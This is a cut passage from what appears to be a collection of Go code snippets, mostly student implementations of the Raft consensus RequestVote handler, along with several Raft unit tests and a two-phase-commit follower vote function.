<-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func TestLearnerCannotVote(t *testing.T) {\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n2)\n\n\tn2.becomeFollower(1, None)\n\n\tn2.Step(pb.Message{From: 1, To: 2, Term: 2, Type: pb.MsgVote, LogTerm: 11, Index: 11})\n\n\tif len(n2.msgs) != 0 {\n\t\tt.Errorf(\"expect learner not to vote, but received %v messages\", n2.msgs)\n\t}\n}", "func TestFreeStuckCandidateWithCheckQuorum(t *testing.T) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(a)\n\tdefer closeAndFreeRaft(b)\n\tdefer closeAndFreeRaft(c)\n\n\ta.checkQuorum = true\n\tb.checkQuorum = true\n\tc.checkQuorum = true\n\n\tnt := newNetwork(a, b, c)\n\tsetRandomizedElectionTimeout(b, b.electionTimeout+1)\n\n\tfor i := 0; i < b.electionTimeout; i++ {\n\t\tb.tick()\n\t}\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(1)\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+1 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+1)\n\t}\n\n\t// Vote again for safety\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+2 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+2)\n\t}\n\n\tnt.recover()\n\tnt.send(pb.Message{From: 1, To: 3, Type: pb.MsgHeartbeat, Term: a.Term})\n\n\t// Disrupt the leader so that the stuck peer is freed\n\tif a.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateFollower)\n\t}\n\n\tif c.Term != a.Term {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, a.Term)\n\t}\n\n\t// Vote again, should become leader this time\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif c.state != StateLeader {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", c.state, StateLeader)\n\t}\n\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.executeLock.Lock()\n\tdefer rf.executeLock.Unlock()\n\n\t//DPrintf(\"[ReceiveRequestVote] [me %v] from [peer %v] start\", rf.me, args.CandidateId)\n\trf.stateLock.Lock()\n\n\tdebugVoteArgs := &RequestVoteArgs{\n\t\tTerm: rf.currentTerm,\n\t\tCandidateId: rf.votedFor,\n\t\tLastLogIndex: int32(len(rf.log) - 1),\n\t\tLastLogTerm: rf.log[len(rf.log)-1].Term,\n\t}\n\tDPrintf(\"[ReceiveRequestVote] [me %#v] self info: %#v from [peer %#v] start\", rf.me, debugVoteArgs, args)\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\treply.LastLog = int32(len(rf.log) - 1)\n\treply.LastLogTerm = rf.log[reply.LastLog].Term\n\tif args.Term < rf.currentTerm {\n\t\tDPrintf(\"[ReceiveRequestVote] [me %v] from %v Term :%v <= currentTerm: %v, return\", rf.me, args.CandidateId, args.Term, rf.currentTerm)\n\t\trf.stateLock.Unlock()\n\t\treturn\n\t}\n\n\tconvrt2Follower := false\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\tconvrt2Follower = true\n\t\trf.persist()\n\t}\n\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\tlastLogIndex := int32(len(rf.log) - 1)\n\t\tlastLogTerm := rf.log[lastLogIndex].Term\n\n\t\tif args.LastLogTerm < lastLogTerm || (args.LastLogTerm == lastLogTerm && args.LastLogIndex < lastLogIndex) {\n\t\t\trf.votedFor = -1\n\t\t\trf.lastHeartbeat = time.Now()\n\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] index from [%v] is oldest, return\", rf.me, args.CandidateId)\n\n\t\t\tif convrt2Follower && rf.role != _Follower {\n\t\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] from %v Term :%v (non-follower) > currentTerm: %v, return\", rf.me, args.CandidateId, args.Term, rf.currentTerm)\n\t\t\t\trf.role = _Unknown\n\t\t\t\trf.stateLock.Unlock()\n\t\t\t\tselect {\n\t\t\t\tcase <-rf.closeCh:\n\t\t\t\tcase rf.roleCh <- _Follower:\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\trf.stateLock.Unlock()\n\t\t\treturn\n\t\t}\n\n\t\trf.votedFor = args.CandidateId\n\t\t// [WARNING] 一旦授权,应该重置超时\n\t\trf.lastHeartbeat = time.Now()\n\t\treply.VoteGranted = true\n\t\tDPrintf(\"[ReceiveRequestVote] [me %v] granted vote for %v\", rf.me, args.CandidateId)\n\t\tif rf.role != _Follower {\n\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] become follower\", rf.me)\n\t\t\trf.role = _Unknown\n\t\t\trf.stateLock.Unlock()\n\t\t\tselect {\n\t\t\tcase <-rf.closeCh:\n\t\t\t\treturn\n\t\t\tcase rf.roleCh <- _Follower:\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\trf.stateLock.Unlock()\n\t\treturn\n\t}\n\tDPrintf(\"[ReceiveRequestVote] [me %v] have voted: %v, return\", rf.me, rf.votedFor)\n\trf.stateLock.Unlock()\n}", "func TestRaft_SlowSendVote(t *testing.T) {\n\thooks := NewSlowVoter(\"sv_0\", \"sv_1\")\n\tcluster := newRaftCluster(t, testLogWriter, \"sv\", 5, hooks)\n\ts := newApplySource(\"SlowSendVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tcurrentTerm := rf.currentTerm\n\tif args == nil {\n\t\tDPrintf(\"Peer-%d received a null vote request.\", rf.me)\n\t\treturn\n\t}\n\tcandidateTerm := args.Term\n\tcandidateId := args.Candidate\n\tDPrintf(\"Peer-%d received a vote request %v from peer-%d.\", rf.me, *args, candidateId)\n\tif candidateTerm < currentTerm {\n\t\tDPrintf(\"Peer-%d's term=%d > candidate's term=%d.\\n\", rf.me, currentTerm, candidateTerm)\n\t\treply.Term = currentTerm\n\t\treply.VoteGrant = false\n\t\treturn\n\t} else if candidateTerm == currentTerm {\n\t\tif rf.voteFor != -1 && rf.voteFor != candidateId {\n\t\t\tDPrintf(\"Peer-%d has grant to peer-%d before this request from peer-%d.\", rf.me, rf.voteFor, candidateId)\n\t\t\treply.Term = currentTerm\n\t\t\treply.VoteGrant = false\n\t\t\treturn\n\t\t}\n\t\tDPrintf(\"Peer-%d's term=%d == candidate's term=%d, to check index.\\n\", rf.me, currentTerm, candidateTerm)\n\t} else {\n\t\tDPrintf(\"Peer-%d's term=%d < candidate's term=%d.\\n\", rf.me, currentTerm, candidateTerm)\n\t\t// begin to update status\n\t\trf.currentTerm = candidateTerm // find larger term, up to date\n\t\trf.transitionState(NewTerm) // transition to Follower.\n\t\tgo func() {\n\t\t\trf.eventChan <- NewTerm // tell the electionService to change state.\n\t\t}()\n\t}\n\t// check whose log is up-to-date\n\tcandiLastLogIndex := args.LastLogIndex\n\tcandiLastLogTerm := args.LastLogTerm\n\tlocalLastLogIndex := len(rf.log) - 1\n\tlocalLastLogTerm := -1\n\tif localLastLogIndex >= 0 {\n\t\tlocalLastLogTerm = rf.log[localLastLogIndex].Term\n\t}\n\t// check term first, if term is the same, then check the index.\n\tDPrintf(\"Peer-%d try to check last entry, loacl: index=%d;term=%d, candi: index=%d,term=%d.\", rf.me, localLastLogIndex, localLastLogTerm, candiLastLogIndex, candiLastLogTerm)\n\tif localLastLogTerm > candiLastLogTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGrant = false\n\t\treturn\n\t} else if localLastLogTerm == candiLastLogTerm {\n\t\tif localLastLogIndex > candiLastLogIndex {\n\t\t\treply.Term = rf.currentTerm\n\t\t\treply.VoteGrant = false\n\t\t\treturn\n\t\t}\n\t} else {\n\t}\n\t// heartbeat.\n\tgo func() {\n\t\trf.eventChan <- HeartBeat\n\t}()\n\t// local log are up-to-date, grant\n\t// before grant to candidate, we should reset ourselves state.\n\trf.transitionState(NewLeader)\n\trf.voteFor = candidateId\n\treply.Term = rf.currentTerm\n\treply.VoteGrant = true\n\tDPrintf(\"Peer-%d grant to peer-%d.\", rf.me, candidateId)\n\trf.persist()\n\treturn\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\t// Your code here (2A, 2B).\n\n\tDPrintf(\" before %v 's request,%v 's votefor is %v\", args.CandidateId, rf.me, rf.voteFor)\n\t//log.Printf(\" before %v 's request,%v 's votefor is %v\", args.CandidateId, rf.me, rf.voteFor)\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\tlog.Printf(\" before %v 's request,%v 's votefor is %v\", args.CandidateId, rf.me, rf.voteFor)\n\n\tDPrintf(\" %v's requesetvote args is %v, and the reciever %v currentTerm is %v\", args.CandidateId, *args, rf.me, rf.currentTerm)\n\t//log.Printf(\" %v's requesetvote args is %v, and the reciever %v currentTerm is %v\", args.CandidateId, *args, rf.me, rf.currentTerm)\n\n\t// all servers\n\tif rf.currentTerm < args.Term {\n\t\trf.convertToFollower(args.Term)\n\t}\n\n\t_voteGranted := false\n\tif rf.currentTerm == args.Term && (rf.voteFor == VOTENULL || rf.voteFor == args.CandidateId) && (rf.getLastLogTerm() < args.LastLogTerm || (rf.getLastLogTerm() == args.LastLogTerm && rf.getLastLogIndex() <= args.LastLogIndex)) {\n\t\trf.state = Follower\n\t\tdropAndSet(rf.grantVoteCh)\n\t\t_voteGranted = true\n\t\trf.voteFor = args.CandidateId\n\t}\n\n\treply.VoteGranted = _voteGranted\n\treply.Term = rf.currentTerm\n\n\tDPrintf(\" after %v 's request,%v 's votefor is %v\", args.CandidateId, rf.me, rf.voteFor)\n\tlog.Printf(\" after %v 's request,%v 's votefor is %v\", args.CandidateId, rf.me, rf.voteFor)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tlastLogIndex, lastLogTerm := len(rf.log) + rf.compactIndex , 0\n\tif lastLogIndex > rf.compactIndex {\n\t\tlastLogTerm = rf.log[lastLogIndex - rf.compactIndex -1].Term\n\t} else if lastLogIndex == rf.compactIndex {\n\t\tlastLogTerm = rf.compactTerm\n\t}\n\n\tif args.Term < rf.currentTerm || (args.Term == rf.currentTerm && args.CandidateID != rf.votedFor) || args.LastLogTerm < lastLogTerm || (args.LastLogTerm == lastLogTerm && lastLogIndex > args.LastLogIndex) {\n\t\t// 1. The Term of RequestVote is out of date.\n\t\t// 2. The instance vote for other peer in this term.\n\t\t// 3. The log of Candidate is not the most update.\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t} else {\n\t\t// DPrintf(\"instance %d vote for %d, Term is %d, lastLogTerm is %d, args.LastLogTerm is %d, lastLogIndex is %d, args.LastLogIndex is %d, original votedFor is %d\", rf.me, args.CandidateID, args.Term, lastLogTerm, args.LastLogTerm, lastLogIndex, args.LastLogIndex, rf.votedFor)\n\t\trf.votedFor = args.CandidateID\n\t\trf.currentTerm = args.Term\n\n\t\treply.VoteGranted = true\n\t\treply.Term = rf.currentTerm\n\n\t\tif rf.role == Follower {\n\t\t\trf.validRpcTimestamp = time.Now()\n\t\t} else {\n\t\t\t// Notify the change of the role of instance.\n\t\t\tclose(rf.rollback)\n\t\t\trf.role = Follower\n\t\t}\n\t}\n\n\treturn\n}", "func TestRaft_SlowRecvVote(t *testing.T) {\n\thooks := NewSlowVoter(\"svr_1\", \"svr_4\", \"svr_3\")\n\thooks.mode = SlowRecv\n\tcluster := newRaftCluster(t, testLogWriter, \"svr\", 5, hooks)\n\ts := newApplySource(\"SlowRecvVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\n\t//All Server rule\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif args.Term > rf.currentTerm {\n\t\trf.beFollower(args.Term)\n\t\t// TODO check\n\t\t// send(rf.voteCh)\n\t}\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\tif (args.Term < rf.currentTerm) || (rf.votedFor != NULL && rf.votedFor != args.CandidateId) {\n\t\t// Reply false if term < currentTerm (§5.1) If votedFor is not null and not candidateId,\n\t} else if args.LastLogTerm < rf.getLastLogTerm() || (args.LastLogTerm == rf.getLastLogTerm() &&\n\t\targs.LastLogIndex < rf.getLastLogIndex()) {\n\t\t//If the logs have last entries with different terms, then the log with the later term is more up-to-date.\n\t\t// If the logs end with the same term, then whichever log is longer is more up-to-date.\n\t\t// Reply false if candidate’s log is at least as up-to-date as receiver’s log\n\t} else {\n\t\t//grant vote\n\t\trf.votedFor = args.CandidateId\n\t\treply.VoteGranted = true\n\t\trf.state = Follower\n\t\trf.persist()\n\t\tsend(rf.voteCh) //because If election timeout elapses without receiving granting vote to candidate, so wake up\n\t}\n}", "func WithVote(candidateId string) func(state *Follower, result *EventResult) (*Follower, *EventResult) {\n\treturn func(state *Follower, result *EventResult) (*Follower, *EventResult) {\n\t\tstate.VotedFor = candidateId\n\t\tresult.Success = true\n\t\treturn state, result\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\tgrantVote := false\n\trf.updateTerm(args.Term) // All servers: if args.Term > rf.currentTerm, set currentTerm, convert to follower\n\n\tswitch rf.state {\n\tcase Follower:\n\t\tif args.Term < rf.currentTerm {\n\t\t\tgrantVote = false\n\t\t} else if rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\t\tif len(rf.logs) == 0 {\n\t\t\t\tgrantVote = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tlastLogTerm := rf.logs[len(rf.logs) - 1].Term\n\t\t\tif (lastLogTerm == args.LastLogTerm && len(rf.logs) <= args.LastLogIndex) || lastLogTerm < args.LastLogTerm {\n\t\t\t\tgrantVote = true\n\t\t\t}\n\t\t}\n\tcase Leader:\n\t\t// may need extra operation since the sender might be out-dated\n\tcase Candidate:\n\t\t// reject because rf has already voted for itself since it's in\n\t\t// Candidate state\n\t}\n\n\tif grantVote {\n\t\t// DPrintf(\"Peer %d: Granted RequestVote RPC from %d.(@%s state)\\n\", rf.me, args.CandidateId, rf.state)\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.CandidateId\n\t\t// reset election timeout\n\t\trf.hasHeartbeat = true\n\t} else {\n\t\t// DPrintf(\"Peer %d: Rejected RequestVote RPC from %d.(@%s state)\\n\", rf.me, args.CandidateId, rf.state)\n\t\treply.VoteGranted = false\n\t}\n\treply.VotersTerm = rf.currentTerm\n\n\t// when deal with cluster member changes, may also need to reject Request\n\t// within MINIMUM ELECTION TIMEOUT\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\tDPrintf(\"before voted reply is %v, me id is %d, votedFor is %d, candidateId is %d, current term is %v, \" +\n\t\t\"args term is %v args log is %v log is %v\", reply, rf.me, rf.votedFor, args.CandidateId,\n\t\trf.currentTerm, args.LastLogTerm, args.LastLogIndex, rf.addLastIncludedIndex(len(rf.log)-1))\n\n\tif rf.currentTerm < args.Term {\n\t\trf.votedFor = -1\n\t\trf.currentTerm = args.Term\n\t\trf.raftState = Follower\n\t\trf.resetTimer()\n\t}\n\tif rf.votedFor == args.CandidateId || rf.votedFor == -1 {\n\t\tlastIndex := len(rf.log) - 1\n\t\tlastLogTerm := rf.log[lastIndex].Term\n\t\tif (args.LastLogTerm > lastLogTerm) ||\n\t\t\t(args.LastLogTerm == lastLogTerm && args.LastLogIndex >= rf.addLastIncludedIndex(lastIndex)) {\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.raftState = Follower\n\t\t\treply.VoteGranted = true\n\t\t\trf.resetTimer()\n\t\t}\n\t}\n\trf.persist()\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n fmt.Printf(\"\\n -> I the Peer %d in got Vote Request from cadidate %d!\\n\",rf.me, args.CandidateId)\n \n rf.mu.Lock()\n defer rf.mu.Unlock() // TODO: ask professor/TA about this atomisitc and if mutex is needed.\n \n reply.FollowerTerm = rf.currentTerm\n \n rf.CheckTerm(args.CandidateTerm) \n \n // 2B code - fix if needed\n logUpToDate := false\n if len(rf.log) == 0 {\n logUpToDate = true\n } else if rf.log[len(rf.log)-1].Term < args.LastLogTerm {\n logUpToDate = true\n } else if rf.log[len(rf.log)-1].Term == args.LastLogTerm && \n len(rf.log) <= (args.LastLogIndex+1) {\n logUpToDate = true\n }\n // 2B code end\n \n reply.VoteGranted = (rf.currentTerm <= args.CandidateTerm && \n (rf.votedFor == -1 || rf.votedFor == args.CandidateId) &&\n logUpToDate) \n\n if reply.VoteGranted {\n rf.votedFor = args.CandidateId\n fmt.Printf(\"-> I the Peer %d say: Vote for cadidate %d Granted!\\n\",rf.me, args.CandidateId)\n } else {\n fmt.Printf(\"-> I the Peer %d say: Vote for cadidate %d Denied :/\\n\",rf.me, args.CandidateId)\n }\n}", "func (f *TPCFollower) vote(key, value string) (tpc_pb.Action, error) {\n\t// the message might be a re-transmission if f is already in the ready state\n\tif f.state == TPC_READY {\n\t\t// if the message carries the same key and value as the pending KV pair,\n\t\t// then return the same action as f promised last time\n\t\tif key == f.pendingEntry.Key && value == f.pendingEntry.Value {\n\t\t\treturn f.pendingEntry.Action, nil\n\n\t\t\t// otherwise, the leader has broken its guarantee and sent message for\n\t\t\t// another operation before the previous one completes\n\t\t} else {\n\t\t\tglog.Errorf(\"tpc follower %s received vote messages for concurrent operations\", f.name)\n\t\t\tos.Exit(-1)\n\t\t}\n\t}\n\n\t// log that the follower has been asked to vote on the KV pair\n\terr := f.journal.Append(journal.Entry{\n\t\tKey: key,\n\t\tValue: value,\n\t\tAction: tpc_pb.Action_PREPARE,\n\t})\n\tif err != nil {\n\t\treturn tpc_pb.Action_ABORT, err\n\t}\n\n\t/*\n\t\tSince the global() method below is responsible for persisting/discarding\n\t\tthe key-value of this operation, but that it only receives a tpc_pb.Action as\n\t\tinput, vote() must store the key-value pair in some external variable that\n\t\tglobal() can access later.\n\n\t\tIn fact, the key-value pair can be stored in f.pendingEntry, because the\n\t\tleader should serialize the operations and process them one at a time, so\n\t\tthe follower should not see another vote message with a new KV pair until\n\t\tthe current operation and KV pair has been finalized.\n\t*/\n\tf.pendingEntry = journal.Entry{\n\t\tKey: key,\n\t\tValue: value,\n\t\tAction: tpc_pb.Action_COMMIT,\n\t}\n\tf.state = TPC_READY\n\treturn tpc_pb.Action_COMMIT, nil\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\tDPrintf(\"Raft node (%d) handles with RequestVote, candidateId: %v\\n\", rf.me, args.CandidateId)\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\treply.Term = rf.currentTerm\n\treply.PeerId = rf.me\n\n\tif rf.currentTerm == args.Term && rf.votedFor != -1 && rf.votedFor != args.CandidateId {\n\t\tDPrintf(\"Raft node (%v) denied vote, votedFor: %v, candidateId: %v.\\n\", rf.me,\n\t\t\trf.votedFor, args.CandidateId)\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tlastLogIndex := len(rf.logs) - 1\n\tlastLogEntry := rf.logs[lastLogIndex]\n\tif lastLogEntry.Term > args.LastLogTerm || lastLogIndex > args.LastLogIndex {\n\t\t// If this node is more up-to-date than candidate, then reject vote\n\t\t//DPrintf(\"Raft node (%v) LastLogIndex: %v, LastLogTerm: %v, args (%v, %v)\\n\", rf.me,\n\t\t//\tlastLogIndex, lastLogEntry.Term, args.LastLogIndex, args.LastLogTerm)\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\trf.tryEnterFollowState(args.Term)\n\n\trf.currentTerm = args.Term\n\trf.votedFor = args.CandidateId\n\treply.VoteGranted = true\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t//fmt.Printf(\"[::RequestVote]\\n\")\n\t// Your code here.\n\trf.mtx.Lock()\n\tdefer rf.mtx.Unlock()\n\tdefer rf.persist()\n\n\treply.VoteGranted = false\n\n\t// case 1: check term\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tif args.Term > rf.currentTerm { // set term to max. and then maybe become leader.\n\t\trf.currentTerm = args.Term\n\t\trf.state = STATE_FOLLOWER\n\t\trf.voteFor = -1\n\t}\n\treply.Term = rf.currentTerm\n\n\t// case 2: check log\n\tisNewer := false\n\tif args.LastLogTerm == rf.log[len(rf.log)-1].Term {\n\t\tisNewer = args.LastLogIndex >= rf.log[len(rf.log)-1].LogIndex\n\t} else {\n\t\tisNewer = args.LastLogTerm > rf.log[len(rf.log)-1].Term\n\t}\n\n\tif (rf.voteFor == -1 || rf.voteFor == args.CandidateId) && isNewer {\n\t\trf.chanVoteOther <- 1\n\t\trf.state = STATE_FOLLOWER\n\t\treply.VoteGranted = true\n\t\trf.voteFor = args.CandidateId\n\t}\n\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.currentTerm > args.Term {\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tif rf.currentTerm < args.Term {\n\t\trf.currentTerm = args.Term\n\t\trf.updateStateTo(FOLLOWER)\n\t\t//妈的咋突然少了段代码~~ 这里要变为follower状态\n\t\t//var wg sync.WaitGroup\n\t\t//wg.Add(1)\n\t\tgo func() {\n\t\t\t//\tdefer wg.Done()\n\t\t\trf.stateChangeCh <- struct{}{}\n\t\t}()\n\n\t\t//wg.Wait()\n\n\t\t//直接return,等待下一轮投票会导致活锁,比如node 1 ,2,3 。 node 1 加term为2,发请求给node2,3,term1。 node2,3更新term拒绝投票\n\t\t//return\n\t}\n\n\t//此处if 在 currentTerm < args.Term下必然成立,在currentTerm等于args.Term下不一定成立\n\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidatedId {\n\t\t//if candidate的log 至少 as up-to-date as reveiver's log\n\t\tlastLogIndex := len(rf.logEntries) - 1\n\t\t//fmt.Println(lastLogIndex,rf.me,rf.logEntries )\n\t\tlastLogTerm := rf.logEntries[len(rf.logEntries)-1].Term\n\t\t//fmt.Println(lastLogIndex,lastLogTerm , args.LastLogIndex,args.LastLogTerm)\n\t\tif lastLogTerm < args.LastLogTerm || (lastLogTerm == args.LastLogTerm && lastLogIndex <= args.LastLogIndex) {\n\t\t\trf.votedFor = args.CandidatedId\n\t\t\treply.Term = rf.currentTerm\n\t\t\treply.VoteGranted = true\n\t\t\t//fmt.Printf(\"[Term %d],Node %d Reply 值为%v. Term= %d , lastIndex = %d <= args.lastLogIndex %d\\n\", rf.currentTerm, rf.me, reply, args.LastLogTerm, lastLogIndex, args.LastLogIndex)\n\t\t\tif rf.status == FOLLOWER {\n\t\t\t\tgo func() { rf.giveVoteCh <- struct{}{} }()\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tfmt.Println(lastLogIndex, lastLogTerm, args.LastLogIndex, args.LastLogTerm)\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\t//fmt.Printf(\"[Term %d] Node %d Reply 值为%v,rf.votefor=%d,\\n\", rf.currentTerm, rf.me, reply, rf.votedFor)\n\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.lock()\n\tdefer rf.unLock()\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\tif args.Term < rf.currentTerm {\n\t\treturn\n\t} else if args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\trf.myState = FollowerState\n\t\trf.persist()\n\t}\n\n\tif rf.votedFor < 0 || rf.votedFor == args.CandidateId {\n\t\t// candidate's logEntries is at least as up-to-date as receiver's logEntries, grant vote\n\t\tlastLogTerm := -1\n\t\tif len(rf.logEntries) != 0 {\n\t\t\tlastLogTerm = rf.logEntries[len(rf.logEntries)-1].Term\n\t\t} else {\n\t\t\tlastLogTerm = rf.lastIncludedTerm\n\t\t}\n\t\tif args.LastLogTerm < lastLogTerm || (args.LastLogTerm == lastLogTerm && args.LastLogIndex < rf.lastIncludedIndex+len(rf.logEntries)) {\n\t\t\treturn\n\t\t} else {\n\t\t\trf.votedFor = args.CandidateId\n\t\t\treply.VoteGranted = true\n\t\t\trf.timerReset = time.Now()\n\t\t\trf.persist()\n\t\t\treturn\n\t\t}\n\t}\n\t// Your code here (2A, 2B).\n}", "func (rf *Raft) Vote(args VoteArgs, reply *VoteReply) {\n\t// Your code here.\n\t// fmt.Printf(\"VOTE : %v get from %v\\n\", rf.me, args.CandidateID)\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\t//Receiver implementation 1\n\tif args.Term < rf.currentTerm {\n\t\t// fmt.Printf(\"VOTE_DENY1 : %v get from %v with %v %v\\n\", rf.me, args.CandidateID, rf.currentTerm, args.Term)\n\t\treturn\n\t}\n\t// args.Term > currentTerm, so update it\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.toFollower()\n\t\trf.persist()\n\t}\n\t//Receiver implementation 2\n\tif !(rf.voteFor == -1 || rf.voteFor == args.CandidateID) {\n\t\t// fmt.Printf(\"VOTE_DENY3 : %v get from %v, voteFor %v %v\\n\", rf.me, args.CandidateID, rf.voteFor, args.CandidateID)\n\t\treturn\n\t}\n\tlastLog := rf.log[len(rf.log)-1]\n\tif args.LastLogTerm < lastLog.Term {\n\t\t// fmt.Printf(\"VOTE_DENY2 : %v get from %v with term %v < %v %v\\n\", rf.me, args.CandidateID, lastLog.Term, args.LastLogTerm, args.LastLogTerm < lastLog.Term)\n\t\treturn\n\t}\n\n\tif args.LastLogTerm == lastLog.Term && len(rf.log) > args.LastLogIndex {\n\t\t// fmt.Printf(\"VOTE_DENY2 : %v get from %v with index %v <= %v %v\\n\", rf.me, args.CandidateID, len(rf.log), args.LastLogIndex, args.LastLogIndex < len(rf.log))\n\t\treturn\n\t}\n\n\t// if rf.voteFor == -1 {\n\t// \tlastLog = rf.log[len(rf.log)-1]\n\t// \tif args.LastLogTerm >= lastLog.Term && args.LastLogIndex >= len(rf.log) {\n\trf.toFollower()\n\treply.VoteGranted = true\n\trf.voteFor = args.CandidateID\n\trf.heartbeatChan <- true\n\trf.persist()\n\t// }\n\t// }\n\n}", "func (rf *Raft) tryToBeLeader() {\n\t//Step 1\n\tvar maxVoteNum, currentSuccessNum int\n\trf.mu.Lock()\n\trf.currentTerm++\n\trf.votedFor = rf.me\n\trf.role = Candidate\n\tmaxVoteNum = len(rf.peers)\n\trf.mu.Unlock()\n\trf.persist()\n\n\tcurrentSuccessNum = 1\n\tvar mutex sync.Mutex\n\tfor i := 0; i < maxVoteNum; i++ {\n\t\tif i != rf.me {\n\t\t\tgo func(idx int) {\n\t\t\t\tvar templateArgs RequestVoteArgs\n\t\t\t\trf.mu.Lock()\n\t\t\t\taLeaderComeUp := rf.role == Follower || rf.role == Leader\n\n\t\t\t\tif aLeaderComeUp {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\ttemplateArgs.Term = rf.currentTerm\n\t\t\t\ttemplateArgs.CandidateID = rf.me\n\t\t\t\ttemplateArgs.LastLogTerm = rf.logs[len(rf.logs)-1].Term\n\t\t\t\ttemplateArgs.LastLogIndex = len(rf.logs) - 1\n\t\t\t\trf.mu.Unlock()\n\n\t\t\t\targs := templateArgs\n\t\t\t\tvar reply RequestVoteReply\n\t\t\t\tok := rf.sendRequestVote(idx, &args, &reply)\n\n\t\t\t\trf.mu.Lock()\n\t\t\t\taLeaderComeUp = rf.role == Follower || rf.role == Leader || rf.role == 